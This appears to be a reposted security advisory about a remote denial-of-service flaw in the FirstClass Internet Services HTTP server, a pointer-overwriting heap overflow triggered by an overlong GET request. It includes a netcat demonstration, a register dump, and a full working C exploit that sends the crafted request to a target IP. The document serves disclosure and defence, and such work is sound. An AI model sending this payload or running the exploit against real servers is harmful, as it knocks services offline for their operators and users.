|
Brought to you by:
Suppliers of:
|
|
|
| |
FirstClass is "a combination of solutions that allows a company to set up a reliable intranet by integrating powerful internet services and including most common communication protocols (SMTP/ HTTP/ FTP/ ...)".
A vulnerability in the product allows remote attackers to cause the HTTP server to crash by sending it a malformed HTTP request. |
| |
Credit:
The information has been provided by Aur?lien BOUDOUX and Fred CHAVEROT.
|
| |
Vulnerable systems:
* FirstClass build 133 (SP3) and prior
FirstClass's "Internet Services" plug-in has a remote DoS vulnerability in the HTTP daemon, which is caused by a heap overflow overwriting a data pointer.
By sending a request on port 80 like: GET / HTTP/1.1[A x 246]
FirstCLass Internet Services will cause an access violation error by trying to read somewhere in the heap some data located outside of the adressing space allocated by the process.
Vendor status:
CENTRINITY Corp. has been told about this problem, and is currently working on fix for the problem.
Example:
D:\netcat>nc -vv 10.0.0.5 80
I2S-w2k [10.0.0.5] 80 (http) open
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDDD
sent 262, rcvd 0: NOTSOCK
D:\netcat>
*** Exception in program C:\FCServer\fcintsrv.exe
Location: CList::GetNext+0000003C (004F882C)
Error: Access violation
Cause: Read attempted at <Unknown> (4444444C)
Registers:
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here
EDX=01F2415C ESI=00000000 EDI=00000000
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206
CS=0000001B DS=00000023 SS=00000023
ES=00000023 FS=00000038 GS=00000000
:004F881D 8B55FC mov edx, dword ptr [ebp-04]
:004F8820 837A0400 cmp dword ptr [edx+04], 00000000
:004F8824 740B je 004F8831
:004F8826 8B45FC mov eax, dword ptr [ebp-04]
:004F8829 8B4804 mov ecx, dword ptr [eax+04]
:004F882C 8B4108 mov eax, dword ptr [ecx+08] <-- crash occurs
:004F882F EB02 jmp 004F8833
Exploit:
/*******************************************
* FirstClass Internet Services Remote DoS *
*******************************************
discovered & coded by I2S-LAB
--------------------------------------------
This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.
CONTACT
_______
Fred CHAVEROT : fred[at]I2S-LAB.com
Aur?lien BOUDOUX : aurelien[at]I2S-LAB.com
URL : http://www.I2S-LaB.com
*******************************************/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
#define PerfectOverwrite 246
void main (int argc, char *argv[])
{
int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");
if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};
lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else
{
printf ("ok!\nSending crafted request...");
send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}
closesocket (sock1);
}
|
|
|
|
|
